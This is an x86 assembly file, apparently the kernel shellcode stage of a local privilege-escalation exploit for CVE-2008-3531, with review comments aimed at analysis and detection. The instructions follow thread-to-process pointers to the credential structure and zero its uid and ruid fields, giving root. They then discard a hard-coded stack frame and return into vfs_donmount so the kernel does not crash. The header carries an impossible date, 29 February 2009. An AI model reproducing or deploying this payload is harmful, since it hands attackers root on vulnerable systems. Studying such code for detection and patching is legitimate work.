# cve-2008-3531-kernelcode.s
# Patroklos Argyroudis, argp at domain census-labs.com
#
# $Id: cve-2008-3531-kernelcode.s,v 935ec53ac86b 2009/02/29 10:50:03 argp $

# ----------------------------------------------------------------------
# _start: flat 32-bit x86 stub (GAS, AT&T operand order: op src, dst).
#
# What the instructions do:
#   1. Follow three pointers (%fs:0 -> +0x4 -> +0x30) to reach what the
#      author labels the current process's credential structure.
#   2. Store zero into two 32-bit fields of that structure (+0x4, +0x8).
#   3. Drop 0xe8 bytes of stack, restore ebx/esi/edi/ebp and return into
#      an outer caller's frame.
#
# Review notes (analysis / detection):
#   - Assumes execution with kernel privilege and a %fs base whose
#     offset 0 holds the current-thread pointer -- TODO confirm against
#     the kernel headers of the affected release.
#   - Every offset below is a hard-coded structure or frame offset; none
#     is derived from headers in this file, so each is presumably valid
#     for one specific kernel build only.
#   - The net effect is a credential change that does not pass through
#     any setuid/login path. The remedy is the vendor kernel fix for the
#     CVE named in the file header.
#   - Only the two fields at +0x4 and +0x8 are written. Other credential
#     fields are untouched, so a process whose uid/ruid are 0 while the
#     rest of its credential still looks unprivileged is a useful
#     triage indicator -- verify field layout before relying on it.
#   - NOTE(review): the store is done in place on the structure the
#     process points at. If that structure is shared with other
#     processes (not visible here), they would observe the same change.
# ----------------------------------------------------------------------
.global _start
_start:

movl    %fs:0, %eax         # eax = pointer at %fs:0 (curthread, per author)
movl    0x4(%eax), %eax     # eax = thread+0x4 (owning proc, per author)
movl    0x30(%eax), %eax    # eax = proc+0x30 (ucred pointer, per author)
xorl    %ecx, %ecx          # ecx = 0, the value written to both fields
movl    %ecx, 0x4(%eax)     # ucred+0x4 = 0 (author: uid)
movl    %ecx, 0x8(%eax)     # ucred+0x8 = 0 (author: ruid)

# Stack unwind. Per the author this resumes in the "pre-previous"
# function, vfs_donmount(), skipping the frame(s) in between.
# 0xe8 (232 bytes) and the pop order presumably mirror the epilogue of
# the frame being discarded in one particular kernel binary -- confirm
# against that binary's disassembly; a different build would leave esp
# and the restored registers wrong.
addl    $0xe8, %esp         # discard 232 bytes of the intervening frame(s)
popl    %ebx                # restore saved registers in the order
popl    %esi                #   ebx, esi, edi, ebp
popl    %edi
popl    %ebp
ret                         # return using the address now at the top of stack

# EOF
